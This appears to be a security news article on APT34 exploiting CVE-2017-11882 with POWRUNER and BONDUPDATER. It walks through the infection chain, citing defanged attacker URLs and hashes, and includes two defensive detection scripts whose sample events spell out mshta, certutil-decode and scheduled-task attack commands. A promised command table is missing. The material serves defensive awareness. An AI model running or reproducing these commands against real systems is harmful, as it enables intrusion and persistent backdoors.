Researchers discovered that hackers are exploiting the Microsoft vulnerability CVE-2017-11882 to target Middle East organizations.

Researchers from FireEye, who first observed the activity in early July, suspect that the Iranian cyber-espionage group APT34 is behind the attack and that it is using custom PowerShell backdoors.

CVE-2017-11882 allows a remote attacker to run arbitrary code in the context of the current user because of the way objects are handled in memory. Microsoft released a patch for the vulnerability on November 14th. Here the attackers are using the vulnerability to deliver POWRUNER and BONDUPDATER to the targeted systems.

How the attack works:
  1. The attacker sends a spear-phishing mail with a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) attached.
  2. The malicious file exploits the CVE-2017-11882 vulnerability and overwrites the function address with an existing instruction from EQNEDT32.EXE.
  3. It creates a child process, “mshta.exe,” which downloads a file named b.txt from hxxp://mumbai-m[.]site/b.txt.
  4. The b.txt file contains a PowerShell command which renames v.txt to v.vbs and executes the script.
  5. It also downloads a dropper from hxxp://dns-update[.]club/v.txt.
  6. The v.vbs script adds four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory C:\ProgramData\Windows\Microsoft\java.
  7. v.vbs decodes the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base using CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services.
  8. v.vbs also drops hUpdateCheckers.ps1 and dUpdateCheckers.ps1 into the staging directory.
  9. The malware launches cUpdateCheckers.bat and creates a scheduled task for GoogleUpdateschecker.vbs persistence.
  10. GoogleUpdateschecker.vbs is executed, and cUpdateCheckers.bat and *.base are deleted from the staging directory.
  11. The scheduled task launches GoogleUpdateschecker.vbs every minute, which executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts.

These PowerShell scripts are the final-stage payload: a downloader with domain generation algorithm (DGA) functionality, and a backdoor component that connects to the C2 server to receive and carry out additional instructions. The backdoor component, POWRUNER, is used to send results to and receive commands from the C2 server, and it is executed every minute by the task scheduler.
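The chain above leaves three host-side traces a defender can alert on: Equation Editor spawning a script host, CertUtil decoding a dropped file into a script, and a scheduled task that fires every minute to run a script from ProgramData. The following is an added example (not code from the article or from FireEye) that applies those three checks to constructed process-creation events; the event field names (`parent`, `image`, `cmdline`) and the sample command lines are assumptions.

```python
import ntpath
import re

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed sample events (field names assumed); paths mirror the chain above.
EVENTS = [
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe hxxp://mumbai-m[.]site/b.txt"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -decode C:\ProgramData\Windows\Microsoft\java\hUpdateCheckers.base "
                r"C:\ProgramData\Windows\Microsoft\java\hUpdateCheckers.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /sc minute /mo 1 /tn GoogleUpdateschecker "
                r"/tr wscript.exe C:\ProgramData\Windows\Microsoft\java\GoogleUpdateschecker.vbs"},
    {"parent": r"C:\Windows\explorer.exe",  # benign: a user opening Word normally
     "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n"},
]

def basename(path):
    return ntpath.basename(path).lower()  # ntpath handles backslashes on any OS

def check_event(ev):
    """Return the names of the rules an event trips (empty list if none)."""
    hits = []
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"].lower()
    # 1. Equation Editor has no business spawning a script host or shell.
    if parent == "eqnedt32.exe" and image in SCRIPT_HOSTS:
        hits.append("eqnedt32_spawns_script_host")
    # 2. certutil -decode used to turn a dropped .base file into a script.
    if image == "certutil.exe" and "-decode" in cmd and re.search(r"\.(ps1|vbs|bat)\b", cmd):
        hits.append("certutil_decode_to_script")
    # 3. A task firing every minute that runs a script out of ProgramData.
    if image == "schtasks.exe" and "/create" in cmd and "/sc minute" in cmd \
            and re.search(r"programdata\\.*\.(vbs|ps1)", cmd):
        hits.append("minute_task_runs_script_from_programdata")
    return hits

def scan(events):
    """Map event index -> rule names for every event that tripped at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}

if __name__ == "__main__":
    for idx, rules in scan(EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```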
POWRUNER sends a random GET request to the C2 server, and the server responds with either a random 11-digit number or a “not_now” command. If the response is a random 11-digit number, POWRUNER sends another GET request to the server and stores the response in a string. POWRUNER then performs an action based on the last digit of the stored random number. The command and action for each value are given below:

After execution, POWRUNER sends the result to the C2 server and stops. POWRUNER is also capable of taking screenshots and sending them back to the server.

The BONDUPDATER script generates subdomains for communication with the C2 server using a custom DGA.

According to the researchers, the malware also collects host information such as the hostname, the currently logged-in user, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data.
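The polling behaviour described above is visible from the network side: one client issuing GETs to the same host about once a minute, each answered with a tiny body (“not_now” is 7 bytes, an 11-digit number is 11). The following is an added example (not code from the article or from FireEye) that looks for that pattern in constructed proxy log lines; the log format, the `.invalid` hostnames and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime

TINY_SIZES = {7, 11}              # len("not_now") == 7; an 11-digit number is 11 bytes
PERIOD, TOLERANCE, MIN_BEACONS = 60, 5, 3   # assumed: ~60 s cadence, 3 periodic gaps to alert

# Constructed proxy log (format assumed): time client host method path status bytes
LOG = """\
2017-12-01T10:00:02 10.1.1.5 updates.example-corp.invalid GET /check 200 7
2017-12-01T10:00:10 10.1.1.5 cdn.example.invalid GET /jquery.js 200 89234
2017-12-01T10:01:01 10.1.1.5 updates.example-corp.invalid GET /check 200 11
2017-12-01T10:01:03 10.1.1.5 updates.example-corp.invalid GET /check 200 11
2017-12-01T10:02:02 10.1.1.5 updates.example-corp.invalid GET /check 200 7
2017-12-01T10:03:01 10.1.1.5 updates.example-corp.invalid GET /check 200 7
2017-12-01T10:03:30 10.1.1.9 intranet.example-corp.invalid GET /news 200 7
"""

def parse(log_text):
    """Turn the constructed log lines into (time, client, host, method, size) tuples."""
    rows = []
    for line in log_text.splitlines():
        ts, client, host, method, _path, _status, size = line.split()
        rows.append((datetime.fromisoformat(ts), client, host, method, int(size)))
    return rows

def find_beacons(rows):
    """Return {(client, host): periodic_gap_count} for pairs whose tiny-response GETs
    recur roughly every PERIOD seconds; the immediate follow-up GET after an
    11-byte reply is simply a non-periodic gap and does not break the pattern."""
    by_pair = defaultdict(list)
    for ts, client, host, method, size in rows:
        if method == "GET" and size in TINY_SIZES:
            by_pair[(client, host)].append(ts)
    hits = {}
    for pair, times in by_pair.items():
        times.sort()
        periodic = sum(1 for a, b in zip(times, times[1:])
                       if abs((b - a).total_seconds() - PERIOD) <= TOLERANCE)
        if periodic >= MIN_BEACONS:
            hits[pair] = periodic
    return hits

if __name__ == "__main__":
    for (client, host), n in find_beacons(parse(LOG)).items():
        print(f"{client} -> {host}: {n} one-minute intervals with tiny replies")
```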
“APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from hxxp://94.23.172.164/dupdatechecker.doc,” FireEye said in its blog post.

Always follow these basic instructions to protect yourself from this type of attack:

  1. Keep the operating system and third-party applications (MS Office, Flash Player, browsers, browser plugins) up to date with the latest patches. In this case, apply the patch Microsoft released for CVE-2017-11882.
  2. Perform regular backups. Ideally, this data should be kept on a separate device, and backups should be stored offline.
  3. Maintain updated antivirus software on all systems.
  4. Don’t open attachments in unsolicited e-mails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited e-mail, even if the link seems benign. If the URL appears genuine, close the e-mail and go to the organization’s website directly through the browser.